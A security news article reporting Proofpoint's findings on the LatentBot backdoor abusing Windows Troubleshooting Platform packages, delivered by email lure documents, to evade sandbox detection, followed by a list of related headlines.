A highly obfuscated malicious backdoor that has been infecting organizations worldwide since 2013 was recently observed abusing the Windows Troubleshooting Platform (WTP) feature for distribution, Proofpoint researchers warn.
Dubbed “LatentBot“, the threat was discovered late last year and is a modular bot. The malware allows attackers to perform surveillance, steal information, and gain remote access operations. What’s more, the malware remained largely undetected for roughly two years before FireEye caught a glimpse of it. Last year, the malware successfully compromised companies in the U.S., U.K., South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland.
In a recent campaign, the malware was observed abusing WTP to trick victims into executing the malicious payload, which was being distributed via email attachments. Because the execution of WTP isn’t accompanied by a security warning and users would run the troubleshooter when it appears in Windows, the attack becomes highly effective, Proofpoint researchers say.
In this campaign, email attachments were used to deliver a lure document, but Proofpoint argues that the same technique could be used with other delivery methods as well. As soon as the malicious document is opened, the victim is asked to “double-click to auto detect charset” and if they comply an embedded OLE object is launched.
Not only is the object a digitally signed DIAGCAB file (the Windows extension for a Troubleshooting pack), but it also presents to the victim another convincingly realistic window. This is a lure to trick the user into executing scripts associated with the troubleshooting package, namely a PowerShell command to download and launch the malicious payload.
The security researchers explain that the attackers using such troubleshooting packages can customize the dialog’s appearance, actions, and scripts that it runs, via XML formatting. Because the malicious activity is performed outside the binary loading the .diagcab file, the malware execution method is highly effective at bypassing detection by many existing sandbox products.
“This continues the trend of malware authors seeking new sandbox evasion methods via COM-based non-standard execution flow; previous examples of these methods are WMI, Office Interoperability, Background Intelligent Transfer Service, and the Task Scheduler. In this instance, via the creation of an IScriptedDiagnosticHost COM object in msdt.exe, the DcomLaunch service starts the Scripted Diagnostics Host (sdiagnhost.exe) which will launch command shell and PowerShell commands,” Proofpoint researchers note.
The LatentBot malware dropped as part of this campaign was observed loading a series of bot plugins for exfiltration and remote access, including Bot_Engine, remote_desktop_service, send_report, security, and vnc_hide_desktop.
Attackers have been seen before abusing built-in Microsoft Windows features for a seamless and low-resistance infection process, and the use of WTP for nefarious purposes is a clear example of how they are looking for new ways to achieve that. The natural “Windows” experience offered in this campaign was bound to fool even experienced users, not to mention that the unusual execution chain would bypass sandbox detection, researchers explain.
Last week, FireEye revealed that attackers have found new means to abuse Windows Management Instrumentation (WMI) queries to evade detection. WMI and PowerShell were seen being leveraged in various attacks by advanced persistent threat (APT) groups, and researchers have found new examples of how WMI queries can be leveraged for nefarious purposes.

More from Ionut Arghire
- Atlassian Warns of Critical Jira Service Management Vulnerability
- Exploitation of Oracle E-Business Suite Vulnerability Starts After PoC Publication
- Google Shells Out $600,000 for OSS-Fuzz Project Integrations
- F5 BIG-IP Vulnerability Can Lead to DoS, Code Execution
- Flaw in Cisco Industrial Appliances Allows Malicious Code to Persist Across Reboots
- HeadCrab Botnet Ensnares 1,200 Redis Servers for Cryptomining
- Malicious NPM, PyPI Packages Stealing User Information
- Boxx Insurance Raises $14.4 Million in Series B Funding
Latest News
- Cyber Insights 2023: Venture Capital
- Atlassian Warns of Critical Jira Service Management Vulnerability
- High-Severity Privilege Escalation Vulnerability Patched in VMware Workstation
- Exploitation of Oracle E-Business Suite Vulnerability Starts After PoC Publication
- China Says It’s Looking Into Report of Spy Balloon Over US
- GoAnywhere MFT Users Warned of Zero-Day Exploit
- Google Shells Out $600,000 for OSS-Fuzz Project Integrations
- F5 BIG-IP Vulnerability Can Lead to DoS, Code Execution
